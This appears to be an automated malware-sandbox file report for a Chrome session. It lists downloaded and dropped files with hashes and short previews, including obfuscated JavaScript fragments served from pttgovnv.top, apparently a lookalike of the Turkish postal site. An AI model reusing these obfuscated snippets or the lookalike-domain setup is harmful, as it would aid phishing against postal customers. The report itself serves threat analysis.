          Preview:if(!window.ACJS){window.ACJS={};}window.ACJS.linkify=function(u){"use strict";var e="aaa aarp abarth abb abbott abbvie abc able abogado abudhabi ac academy accenture accountant accountants aco actor ad adac ads adult ae aeg aero aetna af afl africa ag agakhan agency ai aig airbus airforce airtel akdn al alfaromeo alibaba alipay allfinanz allstate ally alsace alstom am amazon americanexpress americanfamily amex amfam amica amsterdam analytics android anquan anz ao aol apartments app apple aq aquarelle ar arab aramco archi army arpa art arte as asda asia associates at athleta attorney au auction audi audible audio auspost author auto autos avianca aw aws ax axa az azure ba baby baidu banamex bananarepublic band bank bar barcelona barclaycard barclays barefoot bargains baseball basketball bauhaus bayern bb bbc bbt bbva bcg bcn bd be beats beauty beer bentley berlin best bestbuy bet bf bg bh bharti bi bible bid bike bing bingo bio biz bj black blackfriday blockbuster blog bloomberg blue bm
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:downloaded
          Size (bytes):1114
          Entropy (8bit):4.251130351888073
          Encrypted:false
          SSDEEP:24:t9LylyxETgF0Kq7mgctL++X8UEIZDXzdB+rH:2lPTgF0Kq7mggH8UZ7YH
          MD5:9090C370EF1DD7BBF36DF3798544DB2B
          SHA1:A10781354CECA73AA753B38711C44C8256CEF934
          SHA-256:7B4D3164246248283743096A9DAECF1178F07DF98F2EECBCD698208CD81CF2CD
          SHA-512:B8F3A64026602230E92FDEC3FF914D552729FC9FA107635E6161A1CCAC090E02E87A4A99ADE4432FE23BF680165407715C717AFDE663D2A83486D945315F569A
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/img/microphone_close.svg
          Preview:<svg height="511pt" viewBox="-90 1 511 511.99899" style="fill:#b7b7b7;" width="511pt" xmlns="http://www.w3.org/2000/svg"><path d="m332.464844 275.082031c0-8.429687-6.835938-15.265625-15.269532-15.265625-8.433593 0-15.269531 6.835938-15.269531 15.265625 0 74.6875-60.757812 135.445313-135.445312 135.445313-74.683594 0-135.441407-60.757813-135.441407-135.445313 0-8.429687-6.835937-15.265625-15.269531-15.265625-8.433593 0-15.269531 6.835938-15.269531 15.265625 0 86.378907 66.320312 157.539063 150.710938 165.273438v41.105469h-56.664063c-8.433594 0-15.269531 6.835937-15.269531 15.269531 0 8.433593 6.835937 15.269531 15.269531 15.269531h143.871094c8.429687 0 15.265625-6.835938 15.265625-15.269531 0-8.433594-6.835938-15.269531-15.265625-15.269531h-56.667969v-41.105469c84.394531-7.730469 150.714844-78.894531 150.714844-165.273438zm0 0"/><path d="m166.480469 372.851562c53.910156 0 97.769531-43.859374 97.769531-97.769531v-177.316406c0-53.90625-43.859375-97.765625-97.769531-97.765625-53.90625 0-97
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (4650), with no line terminators
          Category:downloaded
          Size (bytes):4708
          Entropy (8bit):5.24982094326148
          Encrypted:false
          SSDEEP:96:LhLALv2dQ13a19GeEc2mvDjHqiqV8SYn1u7+eNEgyJY47186ee7f1lV:xz5Ec1vfqiqVg1u7+eyPY47186ee7f1D
          MD5:0DA2A6E8828A9D4461A27CC813A21CD1
          SHA1:32727963FEC3E91E3951E0551ABA8AC7F45FC89D
          SHA-256:8A87A08F2C1C9AE855AACA4BD6F26B5DE44F28EA9810039F93333CC8E59FD166
          SHA-512:4F6E559C68F275E9C2F2C3C8D04392049C75856279387E74EEF2BD791DE653A81231C8B08BF86C712C905CD2C603A5298B092BCA2F7A29092AD8CD1E1F35FDA1
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/77985128JxKnW.js
          Preview:const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x472517(0x12a))/0x4*(parseInt(_0x472517(0x145))/0x5)+parseInt(_0x472517(0x129))/0x6*(parseInt(_0x472517(0x144))/0x7)+-parseInt(_0x472517(0x12e))/0x8*(parseInt(_0x472517(0x141))/0x9)+parseInt(_0x472517(0x132))/0xa;if(_0x10a64b===_0x4c3503)break;else _0x18f288['push'](_0x18f288['shift']());}catch(_0x2102de){_0x18f288['push'](_0x18f288['shift']());}}}(a16_0x4681,0x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);return _0x31cc45=null,_0x21f428;}}:function(){};return _0x410bd1=![],_0x5c21e7;};}()),a16_0x8c9795=a16_0xaa59f7(this,function(){const _0x3aa272=a16_0x
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (7520)
          Category:dropped
          Size (bytes):7571
          Entropy (8bit):5.418417671489399
          Encrypted:false
          SSDEEP:96:wAgS8hTvHoD9CaBbIw3uwCPOMZ8xQuP3BRGekPuvZAcCaBbIwcbwCPdHimbh63s2:evHoImzbCPO/QuPxQP7tm4cCPd7982M
          MD5:C3F59D2353A4922749DD133F0E0B4A2B
          SHA1:3B0208244AA0888B50CFD936E2568C790ACAAD92
          SHA-256:1B74DB389EFB933E6A8C0A7F3E032C4A6351F67A97EEFDC2639695D105E03890
          SHA-512:9E9A6C6ECCFA1D3F11BE65BE8BA4402F569DA0BBBDD1F77E172F04DBC72349D1AC71220BF06E7C57574C76E077F22C58EBB3CCD4131780CDD535CC2B28AF0D5F
          Malicious:false
          Reputation:low
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{5557:function(e,t,n){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return n(8272)}])},8272:function(e,t,n){"use strict";n.r(t),n.d(t,{__N_SSP:function(){return H},default:function(){return B}});var r=n(3288),s=n(8082),a=n(4926),o=n.n(a),i=n(8196),c=n(9348),u=n(6731),l=n.n(u),f=n(2466),d=n(3395),p=n(5834),y=n.n(p),h=n(1011);var m=function(e){var t=e.stateAction;return(0,r.jsxs)("div",{id:"msm_shipment_time",className:y().container,children:[(0,r.jsx)("i",{onClick:function(){t(!1)},className:"fa-solid fa-xmark"}),(0,r.jsx)("div",{className:y().body,children:(0,r.jsx)(h.Z,{})})]})},_=n(8565),x=n.n(_),v=n(2718),j=n(3230),b=n(9792),g=n(3198),A=n.n(g);function N(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}function S(e,t,n,r,s,a,o){try{var i=e[a](o),c=i.value}catch(u){return void n(u)}i.done?t(c):Promise.resolve(c).then(r,s)}function T(e){return function(){var t=this
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 2256 x 870, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):68762
          Entropy (8bit):7.71915786162258
          Encrypted:false
          SSDEEP:1536:rngMJBc2rGBNTitP9UVe6NdNXdhEr7Fv8p3Q3eWm:EmtrGbTKuD9Xda7yp3Iel
          MD5:C61C112D676A67063CD88EAB7CCD45C0
          SHA1:C242C80410CDA356C2DE2D4E0D23E854CC4DACBD
          SHA-256:AC2B764B80CF484BDFC9BECBE35E90C2FFF150BBAE34DC45532C0C74A293EFF4
          SHA-512:0200342B2A4E4484EDA42EC36BBBBB21E678322AAB9015CFEB54A41888F3AA6AD71423F9228CBCC1FD4155453E1BBDF5788F94CA8D78E33AFCCE400681FEE906
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR.......f.....1.......tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96" xmpMM:DocumentID="xmp.did:66A006C7B8FE11E488B09FFF33422EA0" xmpMM:InstanceID="xmp.iid:66A006C6B8FE11E488B09FFF33422EA0" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2B90E4DDBAB7E4118702D694C2DD9BC9" stRef:documentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%..u....IDATx.....\gy6.w.$..d,l.M.M...M.....!..0.B
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):33304
          Entropy (8bit):7.961845706148848
          Encrypted:false
          SSDEEP:768:QaNY3WBAdXYZ8AcxJHaF3LLnuboDyLoAy2jRROV:QaNYGIXHNJH+3fnuc+oUr2
          MD5:1E5D3CDE4B44D1B35A2CC5EA301E1CBE
          SHA1:49491E19C66AB8D4937218756CAF7E032FEE57D1
          SHA-256:91D51089265627863046D01E337C732315D18F75B9D1788C909DF6A79E117281
          SHA-512:1CDECBF63B8E01B80CB7DAB82D3FAAE2C40ABFA3A91FCD80684540048F07D5D5DDC25ED3907A821A0ADCE2F93A5A1612C9E082AC8F75D938BD3A01CF18ED5DF7
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...x.......n..!$.BB....,.\. ..UZk..=...b.Bmk..k...rj[..}.......Z-U..#...(...!.B....g.....,...;3.......<.........;.k.... ..B.!.E*w.!..B.E.!..B...#..B.!.q..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B...#..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...#..B.!.q..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B.E.!..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...#..B...#..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B.E.!..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...t..BH2.\:.\.......'..r..B........BH<..*..Ji).,....x.._.WZ...{<....B.}.<"...8B..(.........G..G.=.2D.%y.~.U..v[..-.QW.Y .h.#.P..B..`..J+...._...q.ckGN.].D.."...1.......VsVZ..q.,..v...8BH"..J.hS...m...j....S~,.%.z.._....o......
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (6570)
          Category:downloaded
          Size (bytes):6622
          Entropy (8bit):5.441018560135766
          Encrypted:false
          SSDEEP:192:WZc9BoTZ1QMX8mSypSLXQq6RhFXhLghvEh1IZ:cc72Mp3ycLX3Oz6S0
          MD5:576111A3EE04000D9CA3BD40B3333866
          SHA1:F131EA58893190DD12255EAC56E7F848CB712386
          SHA-256:80D723D2E5C52594EDEA4CD4A9147C42931C9A6253D0725EF597383703197F78
          SHA-512:50400A8D613F112C385844DFD269FADF138248DBF6482A60B874FB287EC7D659080DCC88F7F411EDD28E55879F63CA170184F198886B9C5EE6D10AC5304D5E32
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/pages/%5Bslug%5D-88e5a3b326ec670d.js
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6219],{5332:function(e,n,l){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[slug]",function(){return l(797)}])},3846:function(e,n,l){"use strict";var s,t=l(3288),u=l(6830),a=l.n(u),r=l(1395),c=l(2466),o=l(3230),i=l(3395),d=l(6731),_=l.n(d);n.Z=function(e){var n=e.menu,l=e.menus,u=(0,r.useRouter)(),d=(0,c.useRef)(),g=function(e){return!(0,o.lF)(l.filter((function(n){return n.parentMenuId===e}))[0])&&(0,t.jsx)("ul",{className:"".concat(a().menu),children:l&&l.filter((function(n){return n.parentMenuId===e&&!(0,o.lF)(n.languageResources)})).map((function(e){return(0,t.jsxs)("li",{"data-id":(0,o.fI)(e.languageResources,i.rD.MENU).slug,children:[e.url!==i.H_.PAGE_NO_ACTION?(0,t.jsx)(_(),{href:"".concat((0,o.lF)(e.url)||e.url==i.H_.PAGE?"/".concat((0,o.fI)(e.languageResources,i.rD.MENU).slug):e.url),children:(0,t.jsx)("a",{children:(0,o.fI)(e.languageResources,i.rD.MENU).value})}):(0,t.jsxs)(t.Fragment,{children:[(0,o.fI)(e.languageResou
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (32023)
          Category:dropped
          Size (bytes):83612
          Entropy (8bit):5.277084099045577
          Encrypted:false
          SSDEEP:1536:knWi6p4BmVLFijGb2gXke71t5tgPBHlxNLIJBanUEwf7rmvsMn3lhMr:0UL5uxNL/4Cr3lOr
          MD5:0A6E846B954E345951E710CD6CE3440E
          SHA1:FBF9C77D0C4E3C34A485980C1E5316B6212160C8
          SHA-256:B13CB5989E08FCB02314209D101E1102F3D299109BDC253B62AA1DA21C9E38BA
          SHA-512:14653AADEB13635FF6F108137200DE430033050660B6F33B36DD15E92C10D1042FABCC8D08836374769AA8B2FE080DCDF038B8145D803F40167F54D8825AA321
          Malicious:false
          Reputation:low
          Preview:/*! jQuery v2.0.3 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery-2.0.3.min.map.*/.(function(e,undefined){var t,n,r=typeof undefined,i=e.location,o=e.document,s=o.documentElement,a=e.jQuery,u=e.$,l={},c=[],p="2.0.3",f=c.concat,h=c.push,d=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,x=function(e,n){return new x.fn.init(e,n,t)},b=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^-ms-/,N=/-([\da-z])/gi,E=function(e,t){return t.toUpperCase()},S=function(){o.removeEventListener("DOMContentLoaded",S,!1),e.removeEventListener("load",S,!1),x.ready()};x.fn=x.prototype={jquery:p,constructor:x,init:function(e,t,n){var r,i;if(!e)return this;if("string"==typeof e){if(r="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:T.exec(e),!r||!r[1]&&t)return!t||t.jquery?(t||n).find(e):this.constructor(t).find(e);if(r[1]){if(t=t instanceof x?t[0]:t,x.me
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (65329), with no line terminators
          Category:downloaded
          Size (bytes):161114
          Entropy (8bit):5.144436389608998
          Encrypted:false
          SSDEEP:1536:9RohK1FtK8YlXSyGwjUnKznBGDhZB/FEG39tBV1z37fb7K0yF2dDIp:8hKuCyGwjUnKr+RbNtBV1z3LTNC
          MD5:C3DCC3BE21F2F8D1CF00E2E339C699D1
          SHA1:6BE6BC9EDAAA3403BF504DCEA10F7C2104102434
          SHA-256:992416AF8318FB013AED368155200BE56B07B52E70A21A80A1312E721ADAFBA5
          SHA-512:90F7410507965DAD04F076A10D3F10929AD7FEBA071901D6C17BBE014351AA48FF6C3168B3CDEC7F8153C1353EADCE8D5100907C88E73CC8CC88AD1BB4A07748
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/f3c7e6fbJxKnW.js
          Preview:const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt(_0x303bae(0x1a8))/0x4+-parseInt(_0x303bae(0x896))/0x5*(parseInt(_0x303bae(0x146))/0x6)+-parseInt(_0x303bae(0x566))/0x7*(parseInt(_0x303bae(0x148))/0x8)+parseInt(_0x303bae(0xbb))/0x9+parseInt(_0x303bae(0x1a4))/0xa;if(_0xc1e4b0===_0x34a38e)break;else _0x22f25a['push'](_0x22f25a['shift']());}catch(_0x2a237d){_0x22f25a['push'](_0x22f25a['shift']());}}}(a33_0x38b1,0x5cb8c));function a33_0x38b1(){const _0x576f75=['em_ptt_abo','cz0ndHJhbn','>Tebligat\x20','ON\x22\x20id=\x22__','-32','/a></span>','kta_hizmet','YT48L2Rpdj','class=\x22ite','bank.ptt.g','l\x20ui-widge','tAk%C4%B1l','JvZHVjdGlt','age\x20has-su','#ptt_diger','FgIFJmdfMT','lateliUst.','Link\x22\x20clas','d-4\x22><a\x20id','-search\x20sx','tt_pttmati','klamalari','w.cimer.go','0\x20auto',
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:downloaded
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWjb&sid=xdKg7EXtPfKxJvHtBQUj
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text
          Category:downloaded
          Size (bytes):11362
          Entropy (8bit):4.827460510076756
          Encrypted:false
          SSDEEP:192:72kx64y/BHFEhF7Qyhhd7p7ZFkgsJF7Ad9iNxfgDFMyFHgY90isnOdc:7bQdFEhF7xhjFiJFszFTFfc
          MD5:A0B72AE692601CD344CECB38DD306E69
          SHA1:CD4C8370A2C1B2653F91EC59CF3563CA93C004C5
          SHA-256:1684236B0C382AC4F347AA810A14EE04C79B448CF6098F5BEBBA6E532C8391C6
          SHA-512:29A8AB6C8915DAF66BAB7D76A0359B4BFE374C0B6268E53F259A9BD13D71AA92780DDA70CECD21D115A3AFA389562B411D99485C0C5AEA4643AF9059F4674E8D
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/css/page_spa.css
          Preview:.center {. text-align: center;. width: auto;.}..body {. font-family: Tahoma, Geneva, sans-serif;. color: #000;. font-size: 12px;. padding: 0;. margin-top: 10px;.}...panel {. margin-bottom: 2px;. margin-right: 2px;. margin-top: 0;.}...panel .panel-heading, .panel > :first-child {. border-top-left-radius: 0;. border-top-right-radius: 0;.}...panel-heading {. position: relative;. height: 50px;. padding: 0;. border-bottom: 1px solid #eee;. background: #CE0000;.}...panel-control {. height: 100%;. position: relative;. float: right;..}...panel-title {. font-weight: normal;. padding: 0 0 0 20px;. font-size: 1.416em;. line-height: 50px;. white-space: nowrap;. overflow: hidden;. text-overflow: ellipsis;. color: #FFF;.}...panel-control > .btn:last-child, .panel-control > .btn-group:last-child > .btn:first-child {. border-bottom-right-radius: 5px;.}...panel-control .btn, .panel-control .dropdown-toggle.btn {.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:downloaded
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liYg2&sid=fJmUnpo66zoSBdWxBQUm
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:downloaded
          Size (bytes):140991
          Entropy (8bit):5.264901399717059
          Encrypted:false
          SSDEEP:1536:M9vlesNeZ3jR4o2RQ/hmXz4fwKYhOIAMiUqI8ix+vQm1dqNYQyI:M9aJmvKgiUB8ixnyI
          MD5:1D0C748A53E59829E7489BC32E1BF6EA
          SHA1:245BA9E40E10D5113B0BDE991134D26321FFA259
          SHA-256:65A5CB546ABBAB311927A21D335453FAA75C1D5F35E1F058E9934166741C6B95
          SHA-512:F3903CE2E309DACBA41CC8A904C59D5F04D8204503703FC77DBAF47F17954B5B328D0A28A9028ED209C203A7F04037F1382F768B018BE93857CAC00DA0ED2972
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/framework-0438cefc59f69f60.js
          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{2760:function(e,n,t){var r=t(2466),l=t(1062);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=new Set,u={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(u[e]=n,e=0;e<n.length;e++)o.add(n[e])}var c=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
          Category:downloaded
          Size (bytes):77678
          Entropy (8bit):5.213189247182647
          Encrypted:false
          SSDEEP:768:w1BdHluH4ayXM1ZFnqHfbm2GL8Y33xQUOWcKPX+tcQ1ZvGgbng5iCaK828:p4aycxnYU33xQ3eg3CaK8v
          MD5:A68954C92CBC306929A026FB8BE5389E
          SHA1:4B8AC7EB075343DA16FEE848C9B6A6C80B6C1484
          SHA-256:83500803B415AFC9A4F8496789CBA919D635DDE3ADC041A8A69B62F71071BCA7
          SHA-512:2D1E103916519B5352EEE20A58A33D5075E43BF7358EF516320738E2C2B9154C8F1B8EC6CC6751FB8F6A7EB9994B9D56EAE4BC589BBE03605010BFE06CF61AA2
          Malicious:false
          Reputation:low
          URL:https://service-edge.alo-tech.com/static/chat_files/jss/chat_v3.min.js?v=13
          Preview:function defineAloChat(){var c={app_environment:"local",name:"Alotech Chat JS",hostname:"",username:"",chatText:"#chat-text",chatMessage:".mar-btm",btnSendMessage:"#btnSendMessage",aloChatLogout:"#alo-chat-logout",modalChatHistory:"#modalChatHistory",btnChatHistoryY:"#btnChatHistoryY",btnChatHistoryN:"#btnChatHistoryN",modalChatLogoutConfirm:"#modalChatLogoutConfirm",btnChatLogoutConfirmY:"#btnChatLogoutConfirmY",btnChatLogoutConfirmN:"#btnChatLogoutConfirmN",inputUserNameSurName:"#name",queueMessage:"#queue_message",footer:"#footer",chatTags:"#chat_tags",inputPhoneNumber:"#phone_number",inputEmail:"#email",user_email:"",user_phone_number:"",uid:"",cwid:"",ws_server:"chatserver.alo-tech.com",lang:"en",tags:[],optional_email:"",optional_phone:"",hide_email:"",hide_phone_number:"",title:"",title_background_color:"",title_text_color:"",subtitle:"",height:300,width:300,queue:[],legal_requirements:0,widget_version:"",frmStartChat:"#frmStartChat",inputLang:"#lang",inputActiveChatKey:"#active
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (2711), with no line terminators
          Category:downloaded
          Size (bytes):2711
          Entropy (8bit):5.297296092227412
          Encrypted:false
          SSDEEP:48:HX2Ad1LBPjwWtQkMpNbdyQNfSWsn3IQD/hACyEjJPFncz:bLlrxadFdyTWsTFyCPFncz
          MD5:A75A86776204D842DB35D8ACA1B199FB
          SHA1:BA065388EE5E866897DBC75E163FE916B6A35623
          SHA-256:0914A1DE2F752F476BE576F73AA8EA358F8044FC0F7B6B29C76CE08853B4C889
          SHA-512:CD48C0DBC2431CC20B7A1CE96BB8B87DE856C4AA69AC95B617B6F8117642F1DA16709C381D30BBADCD68897A6AE6D887D76A3D8071843BB5965EB8BB1234914A
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/ec21517bJxKnW.js
          Preview:(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_0xfeb21e(0x13a))/0x5*(-parseInt(_0xfeb21e(0x13e))/0x6)+-parseInt(_0xfeb21e(0x13b))/0x7+parseInt(_0xfeb21e(0x137))/0x8*(-parseInt(_0xfeb21e(0x132))/0x9)+parseInt(_0xfeb21e(0x125))/0xa*(parseInt(_0xfeb21e(0x13d))/0xb);if(_0xf4c543===_0x4b5e47)break;else _0x41d4e4['push'](_0x41d4e4['shift']());}catch(_0x4a9f2a){_0x41d4e4['push'](_0x41d4e4['shift']());}}}(a31_0x36de,0xbf971));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);return _0x20dec3=null,_0x25b304;}}:function(){};return _0xc82145=![],_0x5c3b89;};}()),a31_0x193cc0=a31_0x28e7fb(this,function(){const _0xd7d826=a
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:RIFF (little-endian) data, Web/P image
          Category:dropped
          Size (bytes):4546
          Entropy (8bit):7.904885231107719
          Encrypted:false
          SSDEEP:96:ar1jToly4eiMeo/826voWBX99AmMLGHtGNkWcebQxy:ufVR5eo/8Vvo2XYLGHYrcebQxy
          MD5:F33F254A85BDD91ACA8C88DF12D99ACB
          SHA1:C85F7731A9B5BD2B95394D2145B6F63B1039ACE1
          SHA-256:4EC10EE6A2F0D8A0FD1E6CC0A231AEF9ED1E9447582D08795436FC33330EBC23
          SHA-512:076B426C5B3C3C9D6B507300F5C504680683DD3793CEFCA18310BDE9D7210297C0567DC3B7C858B79ABBCAF2B0D16A8EC8BC81D438B923D23401F85FF902C345
          Malicious:false
          Reputation:low
